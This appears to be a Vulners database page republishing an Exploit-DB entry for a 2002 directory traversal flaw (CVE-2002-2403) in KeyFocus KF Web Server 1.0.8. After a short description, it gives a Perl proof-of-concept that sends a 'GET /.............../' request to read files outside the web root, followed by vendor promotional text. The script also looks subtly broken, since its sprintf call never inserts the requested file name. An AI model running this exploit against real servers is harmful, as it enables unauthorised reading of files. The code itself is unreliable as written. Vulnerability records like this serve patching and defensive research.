Lucene search
+L

Key Focus KF Web Server 1.0.8 - Directory Traversal

🗓️ 13 Nov 2002 00:00:00Reported by mattmurphyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

KeyFocus KF Web Server 1.0.8 vulnerable to directory traversal attack via malformed file names.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-2403
1 Nov 200717:00
cve
cvelist
Cvelist
CVE-2002-2403
1 Nov 200717:00
cvelist
euvd
EUVD
EUVD-2002-2381
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-2403
31 Dec 200205:00
nvd
source: https://www.securityfocus.com/bid/6180/info

KeyFocus KF Web Server is vulnerable to a directory traversal attack. This is due to the web server's inability to properly handle file names containing consecutive dot characters. By exploiting this vulnerability, an attacker is able to break out of the web root and retrieve any file readable by the web server. Only files of recognized MIME types can be retrieved.

#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02665
36